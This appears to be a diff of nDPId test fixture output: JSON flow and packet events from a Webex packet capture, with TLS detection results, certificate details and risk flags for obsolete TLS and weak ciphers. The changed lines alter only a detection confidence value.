+00934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":665,"source":"webex.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570674487,"flow_last_seen":1444570674600,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1444570674600,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55665,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01395{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":671,"source":"webex.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570674487,"flow_last_seen":1444570675110,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":4094,"flow_avg_l4_payload_len":682,"midstream":0,"thread_ts_msec":1444570675110,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55665,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": 
{"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":736,"source":"webex.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570675941,"flow_last_seen":1444570675941,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570675941,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51833,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":736,"source":"webex.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1444570675941,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570675941,"pkt":"ABoRAAACABoRAAABCABFAAA8SaRAAEAGwwMKCAABPm3lnsp5AbteGJvVAAAAAKACOQhIBAAAAgQFtAQCCAoATNJxAAAAAAEDAwY="} 
00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":737,"source":"webex.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1444570675945,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570675945,"pkt":"ABoRAAACABoRAAABCABFAAAoAm5AABAGOk4+beWeCggAAQG7ynmh52QqXhib1lAS\/\/+1iAAA"} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":739,"source":"webex.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1444570675946,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570675946,"pkt":"ABoRAAACABoRAAABCABFAAAoSaVAAEAGwxYKCAABPm3lnsp5AbteGJvWoedkK1AQOQh8gQAA"} -00935{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":740,"source":"webex.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570675941,"flow_last_seen":1444570675997,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1444570675997,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51833,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+00935{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":740,"source":"webex.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570675941,"flow_last_seen":1444570675997,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1444570675997,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51833,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":821,"source":"webex.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570679512,"flow_last_seen":1444570679512,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570679512,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55669,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":821,"source":"webex.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1444570679512,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570679512,"pkt":"ABoRAAACABoRAAABCABFAAA8dLdAAEAGDZsKCAABrfMAbtl1Abugj6duAAAAAKACOQhfOgAAAgQFtAQCCAoATNPZAAAAAAEDAwY="} 
00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":822,"source":"webex.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1444570679516,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570679516,"pkt":"ABoRAAACABoRAAABCABFAAAoAphAABAGr86t8wBuCggAAQG72XVfcFiRoI+nb1AS\/\/8cNwAA"} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":823,"source":"webex.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1444570679516,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570679516,"pkt":"ABoRAAACABoRAAABCABFAAAodLhAAEAGDa4KCAABrfMAbtl1Abugj6dvX3BYklAQOQjjLwAA"} -00934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":824,"source":"webex.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570679512,"flow_last_seen":1444570679526,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1444570679526,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55669,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-01395{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":846,"source":"webex.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570679512,"flow_last_seen":1444570680091,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2527,"flow_tot_l4_payload_len":4094,"flow_avg_l4_payload_len":511,"midstream":0,"thread_ts_msec":1444570680091,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55669,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +00934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":824,"source":"webex.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570679512,"flow_last_seen":1444570679526,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1444570679526,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55669,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS 
(v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01395{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":846,"source":"webex.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570679512,"flow_last_seen":1444570680091,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2527,"flow_tot_l4_payload_len":4094,"flow_avg_l4_payload_len":511,"midstream":0,"thread_ts_msec":1444570680091,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55669,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} 
00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1058,"source":"webex.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570693238,"flow_last_seen":1444570693238,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570693238,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55671,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1058,"source":"webex.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1444570693238,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570693238,"pkt":"ABoRAAACABoRAAABCABFAAA8LOJAAEAGVXAKCAABrfMAbtl3AbsPD\/XWAAAAAKACOQic9QAAAgQFtAQCCAoATNk0AAAAAAEDAwY="} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1059,"source":"webex.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1444570693244,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570693244,"pkt":"ABoRAAACABoRAAABCABFAAAoAxBAABAGr1at8wBuCggAAQG72Xfw8AopDw\/111AS\/\/8cNQAA"} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1060,"source":"webex.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1444570693245,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570693245,"pkt":"ABoRAAACABoRAAABCABFAAAoLONAAEAGVYMKCAABrfMAbtl3AbsPD\/XX8PAKKlAQOQjjLQAA"} 
-00935{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1063,"source":"webex.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570693238,"flow_last_seen":1444570693297,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1444570693297,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55671,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01396{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1074,"source":"webex.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570693238,"flow_last_seen":1444570693766,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":4094,"flow_avg_l4_payload_len":682,"midstream":0,"thread_ts_msec":1444570693766,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55671,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": 
{"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +00935{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1063,"source":"webex.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570693238,"flow_last_seen":1444570693297,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1444570693297,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55671,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+01396{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1074,"source":"webex.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570693238,"flow_last_seen":1444570693766,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":4094,"flow_avg_l4_payload_len":682,"midstream":0,"thread_ts_msec":1444570693766,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55671,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1112,"source":"webex.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570694561,"flow_last_seen":1444570694561,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570694561,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51839,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1112,"source":"webex.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1444570694561,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570694561,"pkt":"ABoRAAACABoRAAABCABFAAA802lAAEAGOT4KCAABPm3lnsp\/AbubwQrQAAAAAKACOQiUEgAAAgQFtAQCCAoATNm5AAAAAAEDAwY="} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1113,"source":"webex.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1444570694564,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570694564,"pkt":"ABoRAAACABoRAAABCABFAAAoAytAABAGOZE+beWeCggAAQG7yn9kPvUvm8EK0VAS\/\/+1ggAA"} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1114,"source":"webex.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1444570694564,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570694564,"pkt":"ABoRAAACABoRAAABCABFAAAo02pAAEAGOVEKCAABPm3lnsp\/AbubwQrRZD71MFAQOQh8ewAA"} -00936{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1115,"source":"webex.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570694561,"flow_last_seen":1444570694614,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1444570694614,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51839,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS 
(v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00936{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1115,"source":"webex.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570694561,"flow_last_seen":1444570694614,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1444570694614,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51839,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1230,"source":"webex.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570699074,"flow_last_seen":1444570699074,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570699074,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.241.32.14","src_port":46211,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1230,"source":"webex.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1444570699074,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570699074,"pkt":"ABoRAAACABoRAAABCABFAAA8OjpAAEAGn3oKCAABNvEgDrSDAbvRQeFHAAAAAKACOQhpXwAAAgQFtAQCCAoATNt9AAAAAAEDAwY="} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1231,"source":"webex.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1444570699077,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570699077,"pkt":"ABoRAAACABoRAAABCABFAAAoA2VAABAGBmQ28SAOCggAAQG7tIMuvh640UHhSFAS\/\/+YiwAA"} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1232,"source":"webex.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1444570699077,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570699077,"pkt":"ABoRAAACABoRAAABCABFAAAoOjtAAEAGn40KCAABNvEgDrSDAbvRQeFILr4euVAQOQhfhAAA"} -00958{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1233,"source":"webex.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570699074,"flow_last_seen":1444570699079,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1444570699079,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.241.32.14","src_port":46211,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 
